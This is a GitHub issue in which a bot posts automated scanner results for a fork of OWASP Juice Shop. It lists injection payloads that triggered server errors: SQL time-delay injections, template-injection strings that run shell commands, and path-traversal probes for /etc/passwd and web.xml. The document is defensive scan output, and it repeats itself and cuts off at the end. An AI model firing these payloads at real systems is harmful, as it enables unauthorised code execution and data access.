issues
search
InfoTrackGlobal
/
juice-shop
OWASP Juice Shop: Probably the most modern and sophisticated insecure web application
https://owasp-juice.shop
MIT License
0
stars
0
forks
source link
Vulnerabilities Dashboard - juice-shop
#6
Open
nullify-infotrack[bot]
opened
5 months ago
nullify-infotrack[bot]
commented
5 months ago
App Vulnerabilities Summary
App: juice-shop
Host:
🔴 CRITICAL
🟡 HIGH
🔵 MEDIUM
⚪ LOW
0
0
1
190
A Server Error response code was returned by the server ⚪
## A Server Error response code was returned by the server ## Vulnerabilities | `HTTP Version` | |-| | 1.1 | | `HTTP Version` | |-| | 1.1 | | `HTTP Version` | |-| | 1.1 | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```"``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```"'``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```"+response.write(173,886*109,774)+"``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```"/>
<``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```"><``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```"case when cast(pg_sleep(15) as varchar) > '' then 0 else 1 end -- ``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```"java.lang.Thread.sleep"(15000)``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```#{%x(sleep 2)}``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```#{global.process.mainModule.require('child_process').execSync('sleep 2').toString()}``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```#set($engine="")\n#set($proc=$engine.getClass().forName("java.lang.Runtime").getRuntime().exec("sleep 2"))\n#set($null=$proc.waitFor())\n${null}``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}\``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```${__import__("subprocess").check_output("sleep 2", shell=True)}``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```'``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```'"�``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```'"
``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```'"``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```'(``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```'; select "java.lang.Thread.sleep"(15000) from INFORMATION_SCHEMA.SYSTEM_COLUMNS where TABLE_NAME = 'SYSTEM_COLUMNS' and COLUMN_NAME = 'TABLE_NAME' -- ``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```';print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110));$var='``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```'case when cast(pg_sleep(15) as varchar) > '' then 0 else 1 end -- ``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```(SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```); select "java.lang.Thread.sleep"(15000) from INFORMATION_SCHEMA.SYSTEM_COLUMNS where TABLE_NAME = 'SYSTEM_COLUMNS' and COLUMN_NAME = 'TABLE_NAME' -- ``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```+response.write({0}*{1})+``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```/``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```//1405124357157638069.owasp.org``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```/etc/passwd``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```/orders``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```/WEB-INF/web.xml``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```;``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```; select "java.lang.Thread.sleep"(15000) from INFORMATION_SCHEMA.SYSTEM_COLUMNS where TABLE_NAME = 'SYSTEM_COLUMNS' and COLUMN_NAME = 'TABLE_NAME' -- ``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```;print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110));``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```<``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | `````` | | `HTTP Version` | `Query` | |-|-| | 1.1 | `````` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("sleep 2") }``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```<%=%x(sleep 2)%>``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```<%= global.process.mainModule.require('child_process').execSync('sleep 2').toString()%>``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```
``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```
``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```
``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```
App Vulnerabilities Summary
App: juice-shop
Host:
🔴 CRITICAL🟡 HIGH🔵 MEDIUM⚪ LOWA Server Error response code was returned by the server ⚪
## A Server Error response code was returned by the server ## Vulnerabilities | `HTTP Version` | |-| | 1.1 | | `HTTP Version` | |-| | 1.1 | | `HTTP Version` | |-| | 1.1 | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```"``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```"'``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```"+response.write(173,886*109,774)+"``` | | `HTTP Version` | `Query` | |-|-| | 1.1 | ```"/>